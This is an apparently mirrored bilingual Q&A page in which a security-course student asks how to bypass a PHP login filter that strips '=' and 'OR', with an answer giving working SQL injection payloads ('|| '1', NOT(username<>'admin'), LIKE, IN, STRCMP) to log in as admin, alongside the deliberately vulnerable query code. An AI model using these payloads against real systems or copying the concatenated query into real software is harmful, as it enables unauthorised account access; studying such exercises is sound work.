带php过滤的SQL注入 [英] SQL injection with php filtering
问题描述
我必须插入一个登录表单以进行有关计算机安全课程的练习..... 我已经使用简单的
I have to inject a login form for exercise about a computer security course .... I have passed the first level using the simple
' like 1=1--
在密码字段中,但是现在在第二级中,我必须再次注入具有相同源代码的相同登录表单,除了用户和pwd由称为lvl2_filter()的函数所控制的事实外,我认为这是filter.php的一部分,不接受"="和"OR"
in the password field, but now in the second level i have to inject again the same login form with the same source code except for the fact that user and pwd are being controlled by a function called lvl2_filter() which i think is part of filters.php and do not accept "=" and "OR"
我该怎么做?
用户名和密码字段都不能为空
both username and password field cannot be empty
include_once 'filters.php';
include_once 'config.php';
?>
<?php
$user = lvl2_filter($_REQUEST['user']);
$pwd = lvl2_filter($_REQUEST['pwd']);
$token = $_COOKIE["token_sqli2"];
if (empty($token) || !check_token($token)){
echo "<h1>You need to be logged in!</h1><br>";
}
if (!empty($user) && !empty($pwd)) {
$query = "SELECT user_id FROM users WHERE username='$user' and password='$pwd'";
$result = mysqli_query($db,$query);
if ($result && mysqli_num_rows($result)>0) {
echo "Hi $user, you are logged in.";
verify_user($token, $user);
}
else echo "sorry, invalid username or password";
}
else { ?>
推荐答案
假设 lvl2_filter
的定义,基本上删除了=
和or
的所有出现,直到不再找到为止,仍然应该可以使用
Assuming this definition of lvl2_filter
, which basically removes any occurrence of =
and or
until no longer found, it should still be possible to use the logical OR operation with ||
instead of OR
and a simple expression that evaluates to true like:
username: dummy
password: ' || '1
这将导致:
SELECT user_id FROM users WHERE username='dummy' and password='' || '1'
要选择特定用户,可以使用布尔代数规则,其中x=y
= !(x!=y)
:
For selecting a specific user, one can use the rules of boolean algebra, where x=y
= !(x!=y)
:
username: dummy
password: ' || NOT(username<>'admin') AND '1
这将导致:
SELECT user_id FROM users WHERE username='dummy' and password='' || NOT(username<>'admin') AND '1'
此处<>
等效于!=
,但不包含=
.
Here <>
is equivalent to !=
but doesn’t contain a =
.
还有其他一些操作可以确保 username 等于admin
:
There are also other operations that one could use ensure username equals admin
:
-
username BETWEEN 'admin' AND 'admin'
-
username LIKE 'admin'
-
username IN ('admin')
-
IF(STRCMP(username,'admin'), 0, 1)
-
CASE STRCMP(username,'admin') WHEN 0 THEN 1 ELSE 0 END
- …
username BETWEEN 'admin' AND 'admin'
username LIKE 'admin'
username IN ('admin')
IF(STRCMP(username,'admin'), 0, 1)
CASE STRCMP(username,'admin') WHEN 0 THEN 1 ELSE 0 END
- …
这篇关于带php过滤的SQL注入的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!